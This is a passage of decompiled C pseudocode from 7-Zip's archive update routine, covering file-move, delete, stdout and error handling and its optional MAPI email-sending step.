																																									E003B5464(_t1898 + 0x20);
																																									_t1884 = 0;
																																									__eflags = 0;
																																									goto L239;
																																								}
																																								 *(_t1898 + 0x14) = 0;
																																								do {
																																									_t1888 =  *(_t1898 + 0x14) +  *(_t1898 - 0x1c);
																																									memset(_t1888, 0, 0x18);
																																									 *(_t1888 + 8) =  *(_t1888 + 8) | 0xffffffff;
																																									 *(_t1898 + 0x14) =  &(( *(_t1898 + 0x14))[6]);
																																									_t1901 = _t1901 + 0xc;
																																									 *((intOrPtr*)(_t1888 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)( *(_t1898 - 0x38) + _t1855 * 4))));
																																									_t1135 =  *((intOrPtr*)( *((intOrPtr*)(_t1898 - 0xc4)) + _t1855 * 4));
																																									_t1855 = _t1855 + 1;
																																									 *((intOrPtr*)(_t1888 + 0x10)) =  *_t1135;
																																									__eflags = _t1855 -  *(_t1898 - 0x34);
																																								} while (_t1855 <  *(_t1898 - 0x34));
																																								_t1855 = 0;
																																								__eflags = 0;
																																								goto L235;
																																							} else {
																																								goto L230;
																																							}
																																							do {
																																								L230:
																																								E003B2E5F(_t1898 - 0x28, __eflags,  *((intOrPtr*)( *((intOrPtr*)(_t1898 - 0x74)) + _t1886 * 4)));
																																								 *(_t1898 - 4) = 0x4a;
																																								E003B4489(_t1898 - 0x28);
																																								 *(_t1898 - 4) = 0x4b;
																																								_t1140 = E003C0AB6();
																																								 *(_t1898 - 4) = 0x4c;
																																								E003EF23F(_t1898 - 0x38);
																																								_push(_t1140);
																																								_t1142 = L003E1C39(_t1898 - 0x38);
																																								 *(_t1898 - 4) = 0x4b;
																																								E003B1E40(_t1142,  *(_t1898 - 0x64));
																																								_t1144 = E003C0AB6();
																																								 *(_t1898 - 4) = 0x4d;
																																								E003EF23F(_t1898 - 0xc4);
																																								_push(_t1144);
																																								_t1148 = E003B1E40(E003B1E40(L003E1C39(_t1898 - 0xc4),  *(_t1898 - 0x120)),  *(_t1898 - 0x80));
																																								 *(_t1898 - 4) = 0x49;
																																								E003B1E40(_t1148,  *(_t1898 - 0x28));
																																								_t1901 = _t1901 + 0xc;
																																								_t1886 = _t1886 + 1;
																																								__eflags = _t1886 -  *(_t1898 - 0x70);
																																							} while (__eflags < 0);
																																							goto L231;
																																						}
																																						_t1858 =  *(_t1898 + 0x14);
																																						E003DE02F(_t1858, "7-Zip cannot find MAPISendMail function");
																																						_t1151 =  *_t1858;
																																						__eflags = _t1151 - _t1884;
																																						if(__eflags != 0) {
																																							if(__eflags > 0) {
																																								_t1151 = _t1151 & 0x0000ffff | 0x80070000;
																																								__eflags = _t1151;
																																							}
																																							_t1889 = _t1151;
																																						} else {
																																							_t1889 = 0x80004005;
																																						}
																																						 *(_t1898 - 4) = 0x34;
																																						E003D0A72(_t1470, _t1898 - 0x74);
																																						E003B5464(_t1898 + 0x20);
																																						 *(_t1898 - 4) = 0x1f;
																																						E003B1E40(L003E1AA2(_t1898 - 0x8c),  *(_t1898 - 0x4c));
																																						 *(_t1898 - 4) = 0x15;
																																						L003E1A10(_t1470, _t1898 - 0xa8);
																																						 *(_t1898 - 4) = 0x44;
																																						E003DE00D(_t1898 - 0x44);
																																						 *(_t1898 - 4) = 0x14;
																																						E003D0A72(_t1470, _t1898 - 0x44);
																																						 *(_t1898 - 4) = 0x45;
																																						L227:
																																						E003B1E40(E003B1E40(E003B64B7(_t1898 - 0x9c),  *((intOrPtr*)(_t1898 - 0x98))),  *((intOrPtr*)(_t1898 - 0xb4)));
																																						 *(_t1898 - 4) = 0xd;
																																						E003D0C01(_t1898 - 0x29c);
																																						 *(_t1898 - 4) = 6;
																																						E003B1E40(E003D06AE(_t1898 - 0x24c),  *(_t1898 - 0x58));
																																						_t753 = _t1898 - 4;
																																						 *_t753 =  *(_t1898 - 4) | 0xffffffff;
																																						__eflags =  *_t753;
																																						L003D1830(_t1470, _t1898 - 0x1ac);
																																						L228:
																																						_t984 = _t1889;
																																						goto L271;
																																					}
																																					E003B2D47(_t1898 - 0x124);
																																					 *(_t1898 - 4) = 0x3c;
																																					 *(_t1898 - 0x118) = 1;
																																					E003B601D(_t1898 - 0x124);
																																					 *(_t1898 - 4) = 0x3d;
																																					E003FD423(_t1898 - 0x1c);
																																					 *(_t1898 - 4) = 0x3e;
																																					E003FD423(_t1898 - 0x80);
																																					_t1859 = 0;
																																					__eflags =  *(_t1898 - 0x70) - _t1884;
																																					 *(_t1898 - 4) = 0x3f;
																																					if(__eflags <= 0) {
																																						L209:
																																						 *(_t1898 - 0x64) = _t1884;
																																						 *(_t1898 - 0x60) = _t1884;
																																						 *(_t1898 - 0x5c) = _t1884;
																																						_t1860 =  *(_t1898 - 0x18);
																																						 *(_t1898 - 4) = 0x42;
																																						L003E1BD7(_t1898 - 0x64, _t1860);
																																						 *(_t1898 - 0x60) = _t1860;
																																						_t1861 = 0;
																																						__eflags =  *(_t1898 - 0x18) - _t1884;
																																						if(__eflags <= 0) {
																																							L212:
																																							memset(_t1898 - 0xf4, 0, 0x30);
																																							 *(_t1898 - 0xcc) =  *(_t1898 - 0x60);
																																							 *(_t1898 - 0xc8) =  *(_t1898 - 0x64);
																																							E003B2E5F(_t1898 - 0x28, __eflags,  &(_t1470[0x35]));
																																							__eflags =  *(_t1898 - 0x24);
																																							 *(_t1898 - 4) = 0x43;
																																							if( *(_t1898 - 0x24) != 0) {
																																								memset(_t1898 - 0x144, 0, 0x18);
																																								 *(_t1898 - 0x138) =  *(_t1898 - 0x28);
																																								_t1186 = 1;
																																								 *((intOrPtr*)(_t1898 - 0x140)) = _t1186;
																																								 *((intOrPtr*)(_t1898 - 0xd4)) = _t1186;
																																								 *((intOrPtr*)(_t1898 - 0xd0)) = _t1898 - 0x144;
																																							}
																																							E003B1E40(E003B1E40( *(_t1898 + 0xc)(0, 0, _t1898 - 0xf4, 8, 0),  *(_t1898 - 0x28)),  *(_t1898 - 0x64));
																																							 *(_t1898 - 4) = 0x3e;
																																							E003D0A72(_t1470, _t1898 - 0x80);
																																							 *(_t1898 - 4) = 0x3d;
																																							E003D0A72(_t1470, _t1898 - 0x1c);
																																							 *(_t1898 - 4) = 0x37;
																																							_t1576 = _t1898 - 0x124;
																																							goto L238;
																																						}
																																						 *(_t1898 + 0x14) = _t1884;
																																						do {
																																							_t1891 =  *(_t1898 + 0x14) +  *(_t1898 - 0x64);
																																							memset(_t1891, 0, 0x18);
																																							 *(_t1891 + 8) =  *(_t1891 + 8) | 0xffffffff;
																																							 *(_t1898 + 0x14) =  &(( *(_t1898 + 0x14))[6]);
																																							_t1901 = _t1901 + 0xc;
																																							 *((intOrPtr*)(_t1891 + 0xc)) =  *(( *(_t1898 - 0x1c))[_t1861]);
																																							_t1194 = ( *(_t1898 - 0x80))[_t1861];
																																							_t1861 = _t1861 + 1;
																																							 *((intOrPtr*)(_t1891 + 0x10)) =  *_t1194;
																																							__eflags = _t1861 -  *(_t1898 - 0x18);
																																						} while (__eflags < 0);
																																						goto L212;
																																					} else {
																																						goto L208;
																																					}
																																					do {
																																						L208:
																																						E003B2E5F(_t1898 - 0x28, __eflags,  *((intOrPtr*)( *((intOrPtr*)(_t1898 - 0x74)) + _t1859 * 4)));
																																						 *(_t1898 - 4) = 0x40;
																																						E003B4489(_t1898 - 0x28);
																																						 *(_t1898 - 4) = 0x41;
																																						E003EF23F(_t1898 - 0x1c);
																																						_push(_t1898 - 0x28);
																																						E003B1524(_t1898 - 0x1c);
																																						E003EF23F(_t1898 - 0x80);
																																						_push(_t1898 - 0xc4);
																																						_t1205 = E003B1E40(E003B1524(_t1898 - 0x80),  *((intOrPtr*)(_t1898 - 0xc4)));
																																						 *(_t1898 - 4) = 0x3f;
																																						E003B1E40(_t1205,  *(_t1898 - 0x28));
																																						_t1859 = _t1859 + 1;
																																						__eflags = _t1859 -  *(_t1898 - 0x70);
																																					} while (__eflags < 0);
																																					goto L209;
																																				} else {
																																					goto L204;
																																				}
																																				while(1) {
																																					L204:
																																					_push(_t1898 - 0x1c);
																																					E003DE1A3( *((intOrPtr*)(_t1470[0x16] + _t1853 * 4)) + 0xc, _t1831, __eflags);
																																					 *(_t1898 - 4) = 0x38;
																																					E003B2D47(_t1898 - 0x38);
																																					_t1831 = _t1898 - 0x38;
																																					 *(_t1898 - 4) = 0x39;
																																					__eflags = E003B600A( *(_t1898 - 0x1c), _t1898 - 0x38);
																																					if(__eflags == 0) {
																																						break;
																																					}
																																					E003EF23F(_t1898 - 0x74);
																																					_push(_t1898 - 0x38);
																																					_t1232 = E003B1E40(E003B1524(_t1898 - 0x74),  *(_t1898 - 0x38));
																																					 *(_t1898 - 4) = 0x37;
																																					E003B1E40(_t1232,  *(_t1898 - 0x1c));
																																					_t1853 = _t1853 + 1;
																																					__eflags = _t1853 - _t1470[0x17];
																																					if(__eflags < 0) {
																																						continue;
																																					}
																																					goto L206;
																																				}
																																				_push(_t1898 - 0x1c);
																																				_t1847 = E003DE04A( *(_t1898 + 0x14), _t1898, __eflags, "GetFullPathName error");
																																				E003B1E40(E003B1E40(_t1214,  *(_t1898 - 0x38)),  *(_t1898 - 0x1c));
																																				 *(_t1898 - 4) = 0x34;
																																				E003D0A72(_t1470, _t1898 - 0x74);
																																				E003B5464(_t1898 + 0x20);
																																				 *(_t1898 - 4) = 0x1f;
																																				E003B1E40(L003E1AA2(_t1898 - 0x8c),  *(_t1898 - 0x4c));
																																				 *(_t1898 - 4) = 0x15;
																																				L003E1A10(_t1470, _t1898 - 0xa8);
																																				 *(_t1898 - 4) = 0x3a;
																																				E003DE00D(_t1898 - 0x44);
																																				 *(_t1898 - 4) = 0x14;
																																				E003D0A72(_t1470, _t1898 - 0x44);
																																				 *(_t1898 - 4) = 0x3b;
																																				L216:
																																				E003B1E40(E003B1E40(E003B64B7(_t1898 - 0x9c),  *((intOrPtr*)(_t1898 - 0x98))),  *((intOrPtr*)(_t1898 - 0xb4)));
																																				L217:
																																				 *(_t1898 - 4) = 0xd;
																																				E003D0C01(_t1898 - 0x29c);
																																				 *(_t1898 - 4) = 6;
																																				_t1019 = E003D06AE(_t1898 - 0x24c);
																																				L218:
																																				E003B1E40(_t1019,  *(_t1898 - 0x58));
																																				goto L219;
																																			}
																																			_t1862 =  *(_t1898 + 0x14);
																																			E003DE02F(_t1862, "cannot load Mapi32.dll");
																																			_t1235 =  *_t1862;
																																			__eflags = _t1235 - _t1884;
																																			if(__eflags != 0) {
																																				if(__eflags > 0) {
																																					_t1235 = _t1235 & 0x0000ffff | 0x80070000;
																																					__eflags = _t1235;
																																				}
																																				_t1889 = _t1235;
																																			} else {
																																				_t1889 = 0x80004005;
																																			}
																																			E003B5464(_t1898 + 0x20);
																																			 *(_t1898 - 4) = 0x1f;
																																			E003B1E40(L003E1AA2(_t1898 - 0x8c),  *(_t1898 - 0x4c));
																																			 *(_t1898 - 4) = 0x15;
																																			L003E1A10(_t1470, _t1898 - 0xa8);
																																			 *(_t1898 - 4) = 0x35;
																																			E003DE00D(_t1898 - 0x44);
																																			 *(_t1898 - 4) = 0x14;
																																			E003D0A72(_t1470, _t1898 - 0x44);
																																			 *(_t1898 - 4) = 0x36;
																																			goto L227;
																																		}
																																		_push(_t1898 - 0x38);
																																		 *(_t1898 - 4) = 0x2d;
																																		E003DE285( *(_t1470[0x16]) + 0xc, __eflags);
																																		__eflags =  *((char*)(_t1898 + 0x23));
																																		 *(_t1898 - 4) = 0x2e;
																																		if(__eflags == 0) {
																																			L187:
																																			_t1831 =  *(_t1898 - 0x58);
																																			__eflags = L003B5885( *(_t1898 - 0x38),  *(_t1898 - 0x58));
																																			if(__eflags != 0) {
																																				E003B1E40(_t1247,  *(_t1898 - 0x38));
																																				 *(_t1898 - 4) = 0x20;
																																				goto L195;
																																			}
																																			_t1863 =  *(_t1898 + 0x14);
																																			_push(_t1898 - 0x38);
																																			E003DE04A(_t1863, _t1898, __eflags, "cannot move the file");
																																			_t1470 =  &(_t1863[4]);
																																			E003EF23F( &(_t1863[4]));
																																			_push(_t1898 - 0x58);
																																			E003B1524( &(_t1863[4]));
																																			_t1254 =  *_t1863;
																																			__eflags = _t1254 - _t1884;
																																			if(__eflags != 0) {
																																				if(__eflags > 0) {
																																					_t1254 = _t1254 & 0x0000ffff | 0x80070000;
																																					__eflags = _t1254;
																																				}
																																				_t1889 = _t1254;
																																			} else {
																																				_t1889 = 0x80004005;
																																			}
																																			E003B1E40(_t1254,  *(_t1898 - 0x38));
																																			 *(_t1898 - 4) = 0x1f;
																																			E003B1E40(L003E1AA2(_t1898 - 0x8c),  *(_t1898 - 0x4c));
																																			 *(_t1898 - 4) = 0x15;
																																			L003E1A10(_t1470, _t1898 - 0xa8);
																																			 *(_t1898 - 4) = 0x31;
																																			E003DE00D(_t1898 - 0x44);
																																			 *(_t1898 - 4) = 0x14;
																																			E003D0A72(_t1470, _t1898 - 0x44);
																																			 *(_t1898 - 4) = 0x32;
																																			goto L227;
																																		}
																																		__eflags = L003B5D6C( *(_t1898 - 0x58), __eflags);
																																		if(__eflags != 0) {
																																			goto L187;
																																		}
																																		_push(_t1898 - 0x58);
																																		_t1889 = E003DE04A( *(_t1898 + 0x14), _t1898, __eflags, "cannot delete the file");
																																		E003B1E40(_t1264,  *(_t1898 - 0x38));
																																		 *(_t1898 - 4) = 0x1f;
																																		E003B1E40(L003E1AA2(_t1898 - 0x8c),  *(_t1898 - 0x4c));
																																		 *(_t1898 - 4) = 0x15;
																																		L003E1A10(_t1470, _t1898 - 0xa8);
																																		 *(_t1898 - 4) = 0x2f;
																																		E003DE00D(_t1898 - 0x44);
																																		 *(_t1898 - 4) = 0x14;
																																		E003D0A72(_t1470, _t1898 - 0x44);
																																		 *(_t1898 - 4) = 0x30;
																																		goto L227;
																																	}
																																	 *(_t1898 - 4) = 0x1f;
																																	E003B1E40(L003E1AA2(_t1898 - 0x8c),  *(_t1898 - 0x4c));
																																	 *(_t1898 - 4) = 0x15;
																																	L003E1A10(_t1470, _t1898 - 0xa8);
																																	 *(_t1898 - 4) = 0x2b;
																																	E003DE00D(_t1898 - 0x44);
																																	 *(_t1898 - 4) = 0x14;
																																	E003D0A72(_t1470, _t1898 - 0x44);
																																	 *(_t1898 - 4) = 0x2c;
																																	goto L216;
																																} else {
																																	goto L178;
																																}
																																do {
																																	L178:
																																	_t1277 =  *((intOrPtr*)( *((intOrPtr*)(_t1898 - 0x8c)) + _t1509 * 4));
																																	__eflags =  *((intOrPtr*)(_t1277 + 4)) - _t1884;
																																	if( *((intOrPtr*)(_t1277 + 4)) != _t1884) {
																																		_t1278 =  *_t1277;
																																		_t534 = _t1278 + 0x86;
																																		 *_t534 =  *(_t1278 + 0x86) & 0x00000000;
																																		__eflags =  *_t534;
																																	}
																																	_t1509 = _t1509 + 1;
																																	__eflags = _t1509 -  *((intOrPtr*)(_t1898 - 0x88));
																																} while (_t1509 <  *((intOrPtr*)(_t1898 - 0x88)));
																																goto L181;
																															}
																															_t1847 = L003DBFE0(_t1898 - 0x1ac);
																															__eflags = _t1847 - _t1884;
																															if(__eflags == 0) {
																																E003DC023(_t1898 - 0x1ac, __eflags);
																																goto L177;
																															}
																															 *(_t1898 - 4) = 0x1f;
																															E003B1E40(L003E1AA2(_t1898 - 0x8c),  *(_t1898 - 0x4c));
																															 *(_t1898 - 4) = 0x15;
																															L003E1A10(_t1470, _t1898 - 0xa8);
																															 *(_t1898 - 4) = 0x29;
																															E003DE00D(_t1898 - 0x44);
																															 *(_t1898 - 4) = 0x14;
																															E003D0A72(_t1470, _t1898 - 0x44);
																															 *(_t1898 - 4) = 0x2a;
																															goto L216;
																														} else {
																															goto L156;
																														}
																														do {
																															L156:
																															__eflags =  *((char*)(_t1898 + 0x23));
																															if( *((char*)(_t1898 + 0x23)) == 0) {
																																 *(_t1898 - 0xb8) = _t1884;
																															} else {
																																 *(_t1898 - 0xb8) =  *( *(_t1898 - 0x1ac) +  *(_t1898 - 0x1a8) * 4 - 4);
																															}
																															_t1864 =  *((intOrPtr*)(_t1470[0x16] +  *(_t1898 + 0xc) * 4));
																															E003B2D47(_t1898 - 0x1c);
																															__eflags = _t1470[1];
																															 *(_t1898 - 4) = 0x21;
																															if(__eflags == 0) {
																																_t439 = _t1864 + 0xc; // 0xc
																																_push(_t1898 - 0x28);
																																_t1289 = E003DE1A3(_t439, _t1831, __eflags);
																																 *(_t1898 - 4) = 0x22;
																																_t1290 = E003B2F2F(_t1898 - 0x1c, _t1289);
																																 *(_t1898 - 4) = 0x21;
																																E003B1E40(_t1290,  *(_t1898 - 0x28));
																																__eflags =  *(_t1898 + 0xc) - _t1884;
																																if( *(_t1898 + 0xc) != _t1884) {
																																	L165:
																																	_t447 = _t1898 + 8;
																																	 *_t447 =  *(_t1898 + 8) & 0x00000000;
																																	__eflags =  *_t447;
																																	goto L166;
																																}
																																__eflags =  *_t1470;
																																if( *_t1470 == 0) {
																																	goto L165;
																																}
																																__eflags =  *((char*)(_t1898 + 0x23));
																																if( *((char*)(_t1898 + 0x23)) == 0) {
																																	goto L165;
																																}
																																 *(_t1898 + 8) = 1;
																																goto L166;
																															} else {
																																E003B302D(_t1898 - 0x1c, "stdout");
																																 *(_t1898 + 8) =  *((intOrPtr*)(_t1898 + 0x23));
																																L166:
																																_t1293 =  *((intOrPtr*)( *( *(_t1898 + 0x1c)) + 0x4c))( *(_t1898 - 0x1c),  *(_t1898 + 8));
																																__eflags = _t1293 - _t1884;
																																 *(_t1898 - 0x6c) = _t1293;
																																if(_t1293 != _t1884) {
																																	E003B1E40(_t1293,  *(_t1898 - 0x1c));
																																	 *(_t1898 - 4) = 0x1f;
																																	E003B1E40(L003E1AA2(_t1898 - 0x8c),  *(_t1898 - 0x4c));
																																	 *(_t1898 - 4) = 0x15;
																																	L003E1A10(_t1470, _t1898 - 0xa8);
																																	 *(_t1898 - 4) = 0x23;
																																	E003DE00D(_t1898 - 0x44);
																																	 *(_t1898 - 4) = 0x14;
																																	E003D0A72(_t1470, _t1898 - 0x44);
																																	_t1847 =  *(_t1898 - 0x6c);
																																	 *(_t1898 - 4) = 0x24;
																																	goto L216;
																																}
																																_push(_t1898 - 0x124);
																																 *(_t1898 - 0x118) =  *(_t1898 - 0x118) & 0x00000000;
																																_push( *(_t1898 + 0x1c));
																																_push( *(_t1898 + 0x14));
																																asm("sbb eax, eax");
																																 *(_t1898 - 0x124) = _t1884;
																																_push(_t1898 - 0x8c);
																																 *(_t1898 - 0x120) = _t1884;
																																_push(_t1898 - 0x44);
																																_push( *(_t1898 + 0x18));
																																 *(_t1898 - 0x11c) = _t1884;
																																_push(_t1898 - 0x24c);
																																_push( ~(_t1470[2]) &  *(_t1898 - 0x4c));
																																_push(_t1898 - 0xa8);
																																_t470 = _t1864 + 0xc; // 0xc
																																_push( *(_t1898 - 0xb8));
																																_push(_t1864 + 0x64);
																																_push( *((intOrPtr*)(_t1898 - 0x68)));
																																_t1847 = E003E0313(_t1470,  *(_t1898 + 8));
																																__eflags = _t1847 - _t1884;
																																if(_t1847 != _t1884) {
																																	E003B1E40(_t1305,  *(_t1898 - 0x1c));
																																	 *(_t1898 - 4) = 0x1f;
																																	E003B1E40(L003E1AA2(_t1898 - 0x8c),  *(_t1898 - 0x4c));
																																	 *(_t1898 - 4) = 0x15;
																																	L003E1A10(_t1470, _t1898 - 0xa8);
																																	 *(_t1898 - 4) = 0x25;
																																	E003DE00D(_t1898 - 0x44);
																																	 *(_t1898 - 4) = 0x14;
																																	E003D0A72(_t1470, _t1898 - 0x44);
																																	 *(_t1898 - 4) = 0x26;
																																	goto L216;
																																}
																																_t1831 = _t1898 - 0x124;
																																_t1847 =  *((intOrPtr*)( *( *(_t1898 + 0x1c)) + 0x50))(_t1898 - 0x124);
																																__eflags = _t1847 - _t1884;
																																if(_t1847 != _t1884) {
																																	E003B1E40(_t1313,  *(_t1898 - 0x1c));
																																	 *(_t1898 - 4) = 0x1f;
																																	E003B1E40(L003E1AA2(_t1898 - 0x8c),  *(_t1898 - 0x4c));
																																	 *(_t1898 - 4) = 0x15;
																																	L003E1A10(_t1470, _t1898 - 0xa8);
																																	 *(_t1898 - 4) = 0x27;
																																	E003DE00D(_t1898 - 0x44);
																																	 *(_t1898 - 4) = 0x14;
																																	E003D0A72(_t1470, _t1898 - 0x44);
																																	 *(_t1898 - 4) = 0x28;
																																	goto L216;
																																}
																															}
																															 *(_t1898 - 4) = 0x20;
																															E003B1E40(_t1313,  *(_t1898 - 0x1c));
																															 *(_t1898 + 0xc) =  *(_t1898 + 0xc) + 1;
																															__eflags =  *(_t1898 + 0xc) - _t1470[0x17];
																														} while ( *(_t1898 + 0xc) < _t1470[0x17]);
																														goto L170;
																													}
																													_t1866 =  *(_t1898 - 0x224);
																													E003B421F(_t1898 - 0x4c, _t1866);
																													_t1327 = 0;
																													__eflags = _t1866 - _t1884;
																													if(_t1866 <= _t1884) {
																														goto L155;
																													} else {
																														goto L154;
																													}
																													do {
																														L154:
																														 *(_t1327 +  *(_t1898 - 0x4c)) =  *(_t1327 +  *(_t1898 - 0x4c)) & 0x00000000;
																														_t1327 = _t1327 + 1;
																														__eflags = _t1327 - _t1866;
																													} while (_t1327 < _t1866);
																													goto L155;
																												}
																												_t1831 =  *( *(_t1898 - 0x1ac) +  *(_t1898 - 0x1a8) * 4 - 4);
																												_push(_t1898 - 0xa8);
																												_t1847 = L003E1794(_t1470,  *(_t1898 + 0xc),  *( *(_t1898 - 0x1ac) +  *(_t1898 - 0x1a8) * 4 - 4), __eflags);
																												__eflags = _t1847 - _t1884;
																												if(_t1847 == _t1884) {
																													goto L152;
																												}
																												 *(_t1898 - 4) = 0x15;
																												L003E1A10(_t1470, _t1898 - 0xa8);
																												 *(_t1898 - 4) = 0x1d;
																												E003DE00D(_t1898 - 0x44);
																												 *(_t1898 - 4) = 0x14;
																												E003D0A72(_t1470, _t1898 - 0x44);
																												 *(_t1898 - 4) = 0x1e;
																												goto L216;
																											} else {
																												goto L135;
																											}
																											do {
																												L135:
																												__eflags =  *(_t1898 + 0xb);
																												_t1892 =  *((intOrPtr*)(_t1470[0x16] + _t1849 * 4)) + 0xc;
																												if( *(_t1898 + 0xb) != 0) {
																													E003B2F2F(_t1892 + 0xc, _t1898 - 0xb4);
																												}
																												__eflags = _t1470[1];
																												if(_t1470[1] == 0) {
																													__eflags = _t1849;
																													if(__eflags > 0) {
																														L140:
																														_push(_t1898 - 0x38);
																														E003DE1A3(_t1892, _t1831, __eflags);
																														 *(_t1898 - 4) = 0x19;
																														_t1338 = E003B7034( *(_t1898 - 0x38), __eflags);
																														__eflags = _t1338;
																														if(_t1338 != 0) {
																															_t1867 =  *(_t1898 + 0x14);
																															 *_t1867 = 0x50;
																															E003B2711( &(_t1867[1]), "The file already exists");
																															_t1470 =  &(_t1867[4]);
																															E003EF23F( &(_t1867[4]));
																															_push(_t1898 - 0x38);
																															_t1342 = E003B1524( &(_t1867[4]));
																															_t1847 =  *_t1867;
																															__eflags = _t1847;
																															if(__eflags != 0) {
																																if(__eflags > 0) {
																																	_t1847 = _t1847 & 0x0000ffff | 0x80070000;
																																	__eflags = _t1847;
																																}
																															} else {
																																_t1847 = 0x80004005;
																															}
																															E003B1E40(_t1342,  *(_t1898 - 0x38));
																															 *(_t1898 - 4) = 0x1a;
																															E003DE00D(_t1898 - 0x44);
																															 *(_t1898 - 4) = 0x14;
																															E003D0A72(_t1470, _t1898 - 0x44);
																															 *(_t1898 - 4) = 0x1b;
																															goto L216;
																														}
																														 *(_t1898 - 4) = 0x15;
																														E003B1E40(_t1338,  *(_t1898 - 0x38));
																														goto L142;
																													}
																													__eflags =  *(_t1898 + 0x13);
																													if(__eflags != 0) {
																														goto L142;
																													}
																													goto L140;
																												}
																												L142:
																												_t1849 = _t1849 + 1;
																												__eflags = _t1849 - _t1470[0x17];
																											} while (_t1849 < _t1470[0x17]);
																											_t1884 = 0;
																											__eflags = 0;
																											goto L144;
																										}
																										_t1869 = 0;
																										__eflags = _t1470[0x17];
																										if(__eflags <= 0) {
																											goto L134;
																										} else {
																											goto L127;
																										}
																										while(1) {
																											L127:
																											_push(_t1898 - 0x80);
																											_t1352 = E003DE1A3( *((intOrPtr*)(_t1470[0x16] + _t1869 * 4)) + 0xc, _t1831, __eflags);
																											_t1893 = 0;
																											 *(_t1898 - 4) = 0x16;
																											__eflags =  *(_t1898 - 0x224);
																											if( *(_t1898 - 0x224) <= 0) {
																												goto L131;
																											} else {
																												goto L128;
																											}
																											do {
																												L128:
																												E003CED4D(_t1898 - 0x24c, _t1898 - 0x28, _t1893);
																												_t1356 =  *(_t1898 - 0x24);
																												 *(_t1898 - 4) = 0x17;
																												__eflags =  *(_t1898 - 0x24) -  *((intOrPtr*)(_t1898 - 0x7c));
																												if( *(_t1898 - 0x24) !=  *((intOrPtr*)(_t1898 - 0x7c))) {
																													goto L130;
																												}
																												_t1356 = wcscmp( *(_t1898 - 0x28),  *(_t1898 - 0x80));
																												__eflags = _t1356;
																												if(_t1356 == 0) {
																													E003B2D47(_t1898 - 0x38);
																													 *(_t1898 - 4) = 0x18;
																													E003B302D(_t1898 - 0x38, "It is not allowed to include archive to itself");
																													E003B30B5(_t1898 - 0x38);
																													E003B3128(_t1898 - 0x38, __eflags, _t1898 - 0x80);
																													E003B2E5F(_t1898 - 0x2a8, __eflags, _t1898 - 0x38);
																													_push(0x4349e0);
																													_push(_t1898 - 0x2a8);
																													L0041F1D0();
																													goto L134;
																												}
																												L130:
																												 *(_t1898 - 4) = 0x16;
																												_t1352 = E003B1E40(_t1356,  *(_t1898 - 0x28));
																												_t1893 = _t1893 + 1;
																												__eflags = _t1893 -  *(_t1898 - 0x224);
																											} while (_t1893 <  *(_t1898 - 0x224));
																											L131:
																											 *(_t1898 - 4) = 0x15;
																											E003B1E40(_t1352,  *(_t1898 - 0x80));
																											_t1869 = _t1869 + 1;
																											__eflags = _t1869 - _t1470[0x17];
																											if(__eflags >= 0) {
																												goto L134;
																											}
																										}
																									} else {
																										__eflags =  *_t1470;
																										if( *_t1470 == 0) {
																											goto L125;
																										}
																										_t1870 =  *(_t1470[0x16]) + 0xc;
																										L003E195A(_t1870,  &(_t1470[0x19]));
																										__eflags =  *((char*)(_t1898 + 0x23));
																										if( *((char*)(_t1898 + 0x23)) != 0) {
																											L119:
																											__eflags =  *(_t1898 + 0xb);
																											if( *(_t1898 + 0xb) == 0) {
																												__eflags = _t1470[0x3f];
																												if(_t1470[0x3f] == 0) {
																													 *((char*)(_t1870 + 0x3c)) = 1;
																													__eflags = _t1470[0x39];
																													 *(_t1898 + 0x13) = 1;
																													_t1894 = _t1870 + 0x40;
																													if(_t1470[0x39] == 0) {
																														_t1871 = _t1870 + 0xc;
																														__eflags = _t1871;
																														_push(_t1871);
																													} else {
																														_push( &(_t1470[0x38]));
																													}
																													E003B2F2F(_t1894);
																													E003B8274(_t1894);
																												}
																											}
																											goto L125;
																										}
																										__eflags = _t1470[0x39];
																										if(_t1470[0x39] == 0) {
																											goto L125;
																										}
																										goto L119;
																									}
																								}
																								 *(_t1898 + 0x10) =  *(_t1898 + 0x10) & 0x00000000;
																								__eflags = _t1470[0x17];
																								if(_t1470[0x17] <= 0) {
																									goto L112;
																								}
																								_t1840 = _t1470[0x16];
																								do {
																									_t1377 =  *_t1840 + 0x64;
																									_t1872 = 0;
																									__eflags = 0;
																									_t1756 = _t1377;
																									while(1) {
																										__eflags =  *_t1756 - 2;
																										if( *_t1756 == 2) {
																											break;
																										}
																										_t1872 = _t1872 + 1;
																										_t1756 = _t1756 + 4;
																										__eflags = _t1872 - 7;
																										if(_t1872 < 7) {
																											continue;
																										}
																										_t1407 = _t1377 + 4;
																										__eflags = _t1407;
																										_t1775 = 1;
																										while(1) {
																											__eflags =  *_t1407;
																											if( *_t1407 != 0) {
																												goto L95;
																											}
																											_t1775 = _t1775 + 1;
																											_t1407 = _t1407 + 4;
																											__eflags = _t1775 - 7;
																											if(_t1775 < 7) {
																												continue;
																											}
																											goto L96;
																										}
																										break;
																									}
																									L95:
																									 *(_t1898 + 0xb) = 1;
																									L96:
																									 *(_t1898 + 0x10) =  *(_t1898 + 0x10) + 1;
																									_t1840 = _t1840 + 4;
																									__eflags =  *(_t1898 + 0x10) - _t1470[0x17];
																								} while ( *(_t1898 + 0x10) < _t1470[0x17]);
																								__eflags =  *(_t1898 + 0xb);
																								if( *(_t1898 + 0xb) == 0) {
																									goto L112;
																								}
																								_t1380 =  *((intOrPtr*)( *_t1883 + 0x40))();
																								__eflags = _t1380;
																								if(_t1380 == 0) {
																									_t1873 =  *(_t1898 + 0xc);
																									 *((char*)(_t1898 - 0x21c)) = _t1470[4];
																									 *((char*)(_t1898 - 0x1b7)) = _t1470[2];
																									 *((char*)(_t1898 - 0x21b)) = _t1470[3];
																									 *((char*)(_t1898 - 0x21a)) =  *((intOrPtr*)(_t1873 + 0xc));
																									 *((char*)(_t1898 - 0x219)) =  *((intOrPtr*)(_t1873 + 0xd));
																									 *((char*)(_t1898 - 0x218)) = _t1470[0];
																									_t1387 = E003B2D47(_t1898 - 0x28);
																									_t1831 = _t1470[7];
																									_push(_t1898 - 0x24c);
																									_push(_t1387);
																									 *(_t1898 - 4) = 0x10;
																									_t1847 = E003CF237(_t1873, _t1470[7]);
																									 *(_t1898 - 4) = 0xe;
																									E003B1E40(_t1388,  *(_t1898 - 0x28));
																									__eflags = _t1847;
																									if(_t1847 == 0) {
																										_t1380 =  *((intOrPtr*)( *_t1883 + 0x44))(_t1898 - 0x214);
																										__eflags = _t1380;
																										if(_t1380 != 0) {
																											goto L99;
																										}
																										__eflags = _t1470[7] - 2;
																										if(_t1470[7] != 2) {
																											_t1895 =  *(_t1898 + 0xc);
